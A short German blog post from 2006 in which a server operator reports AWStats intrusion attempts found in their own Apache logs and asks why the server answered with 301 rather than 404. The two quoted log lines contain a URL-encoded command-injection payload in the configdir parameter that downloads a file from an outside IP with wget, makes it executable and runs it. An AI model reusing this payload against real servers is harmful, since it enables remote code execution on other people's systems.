AWStats Einbruchsversuche
24. Januar 2006 | Kategorie: RootserverGut das auf meinem Server kein AWStats installiert ist. Denn so wie das ausschaut, ist noch immer ein Einbruch möglich, sofern AWStats auf dem Server installiert ist. IM Adminblog hab ich dazu eben einen Beitrag entdeckt. Hatte auch früher schon in verschiedenen Foren dazu was gepostet, da auch ich diese Logeinträge in meinen Logs vorfinde.
67.15.94.44 – - [22/Jan/2006:05:12:35 +0100] “GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%
3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%
20killop%3b%2e%2fkillop;echo%20YYY;echo| HTTP/1.1″ 301 430 62.141.50.170 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)” “-”67.15.94.44 – - [22/Jan/2006:05:12:37 +0100] “GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%
2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%
20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo| HTTP/1.1″ 302 221 62.141.50.170 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)” “-”
Allerdings werden diese Aufrufe mit 301 bestätigt. Warum denn das? Müsste doch eigentlich ein 404 sein, da es diese Pfade bei mir nicht gibt, oder?
--------------------------------------------------------------------------------------------
Keine ähnliche Beiträge gefunden...
